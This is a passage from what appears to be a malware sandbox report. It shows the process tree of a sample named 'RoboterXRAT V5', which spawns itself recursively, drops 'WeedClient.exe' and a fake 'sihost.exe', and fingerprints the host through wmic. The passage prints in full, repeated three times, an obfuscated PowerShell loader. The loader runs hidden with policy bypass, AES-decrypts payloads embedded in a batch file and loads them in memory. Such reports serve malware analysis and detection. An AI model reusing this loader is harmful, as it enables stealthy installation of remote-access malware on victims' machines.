C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"49⤵PID:2112
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"50⤵PID:4192
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"51⤵PID:5176
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"52⤵PID:2724
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"53⤵PID:4696
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"54⤵PID:1752
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"55⤵PID:2380
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"56⤵PID:2816
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"57⤵PID:5268
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"58⤵PID:1276
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"59⤵PID:596
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"59⤵PID:2768
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"59⤵PID:5440
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid60⤵PID:3156
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"58⤵PID:1324
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"58⤵PID:5308
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid59⤵PID:5844
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"57⤵PID:3316
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"57⤵PID:2936
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid58⤵PID:4168
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"56⤵PID:4084
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"56⤵PID:4452
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid57⤵PID:408
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"55⤵PID:5616
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"55⤵PID:5152
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid56⤵PID:5420
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"54⤵PID:5952
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"54⤵PID:5332
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid55⤵PID:4764
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"53⤵PID:6136
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"53⤵PID:1648
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid54⤵PID:5668
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"52⤵PID:5824
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"52⤵PID:5620
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid53⤵PID:4440
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"51⤵PID:1216
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"51⤵PID:4184
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid52⤵PID:5880
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"50⤵PID:1752
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"50⤵PID:4668
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid51⤵PID:824
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"49⤵PID:3016
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"49⤵PID:5988
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid50⤵PID:5168
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"48⤵PID:628
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"48⤵PID:4896
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid49⤵PID:4680
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"47⤵PID:3620
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"47⤵PID:3264
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid48⤵PID:5764
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV149⤵PID:5224
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"46⤵PID:1004
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"46⤵PID:5596
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid47⤵PID:4544
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"45⤵PID:2472
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"45⤵PID:5736
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid46⤵PID:5832
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"44⤵PID:2328
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"44⤵PID:2800
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid45⤵PID:4108
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV146⤵PID:3208
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"43⤵PID:2112
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"43⤵PID:2752
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid44⤵PID:5208
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"42⤵PID:752
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"42⤵PID:5492
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid43⤵PID:5288
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"41⤵PID:1220
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"41⤵PID:2808
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid42⤵PID:5484
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"40⤵PID:2964
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"40⤵PID:2816
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid41⤵PID:3172
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"39⤵PID:6048
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"39⤵PID:5608
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"38⤵PID:5716
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"38⤵PID:5916
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid39⤵PID:5568
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"37⤵PID:1812
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"37⤵PID:360
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid38⤵PID:2032
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"36⤵PID:2816
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"36⤵PID:3088
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"35⤵PID:2520
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"35⤵PID:1920
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid36⤵PID:3316
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"34⤵PID:6000
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"34⤵PID:5268
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid35⤵PID:3396
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"33⤵PID:4956
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"33⤵PID:4192
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid34⤵PID:4580
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"32⤵PID:4764
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"32⤵PID:5968
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid33⤵PID:5648
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV134⤵PID:4356
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"31⤵PID:5864
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"31⤵PID:1888
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid32⤵PID:828
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"30⤵PID:3656
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"30⤵PID:5460
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid31⤵PID:4128
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"29⤵PID:5332
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"29⤵PID:5220
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid30⤵PID:5712
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"28⤵PID:5148
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"28⤵PID:8
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid29⤵PID:1116
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"27⤵PID:5720
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"27⤵PID:5568
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid28⤵PID:5116
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"26⤵PID:5660
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"26⤵PID:5796
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid27⤵PID:3620
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"25⤵PID:5128
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"25⤵PID:3316
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid26⤵PID:3604
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"24⤵PID:3880
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"24⤵PID:5336
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid25⤵PID:6060
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"23⤵PID:3092
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"23⤵PID:6060
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid24⤵PID:3884
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV125⤵PID:828
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"22⤵PID:5636
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"22⤵PID:5476
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"21⤵PID:5256
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"21⤵PID:6048
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid22⤵PID:4584
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"20⤵PID:3732
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"20⤵PID:5988
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid21⤵PID:2724
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"19⤵PID:3876
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"19⤵PID:5476
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"18⤵PID:5888
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"18⤵PID:5844
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid19⤵PID:5276
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"17⤵
- System Location Discovery: System Language Discovery
PID:6112
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"17⤵PID:4908
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"16⤵
- System Location Discovery: System Language Discovery
PID:4380
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"16⤵PID:192
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"15⤵
- System Location Discovery: System Language Discovery
PID:3520
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"15⤵PID:5936
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"14⤵
- System Location Discovery: System Language Discovery
PID:5380
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"14⤵PID:6128
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"13⤵
- System Location Discovery: System Language Discovery
PID:2952
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"13⤵PID:4044
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "11⤵PID:4532
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:2980
-
-
C:\Windows\system32\net.exenet file12⤵PID:4564
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file13⤵PID:3316
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));12⤵
- Command and Scripting Interpreter: PowerShell
PID:3596
-
-
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"11⤵
- Executes dropped EXE
PID:2148
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "10⤵PID:820
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV111⤵PID:1036
-
-
C:\Windows\system32\net.exenet file11⤵PID:3596
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file12⤵PID:5116
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));11⤵
- Command and Scripting Interpreter: PowerShell
PID:4448
-
-
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"10⤵
- Executes dropped EXE
PID:1640
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "9⤵PID:2804
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV110⤵PID:3960
-
-
C:\Windows\system32\net.exenet file10⤵PID:1944
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file11⤵PID:2932
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4820
-
-
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"9⤵
- Executes dropped EXE
PID:4904 -
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"10⤵
- Executes dropped EXE
PID:1188 -
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"11⤵
- Executes dropped EXE
PID:1860 -
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"12⤵
- Executes dropped EXE
PID:4788 -
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"13⤵PID:3604
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"14⤵PID:2800
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"15⤵PID:6136
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"16⤵PID:5604
-
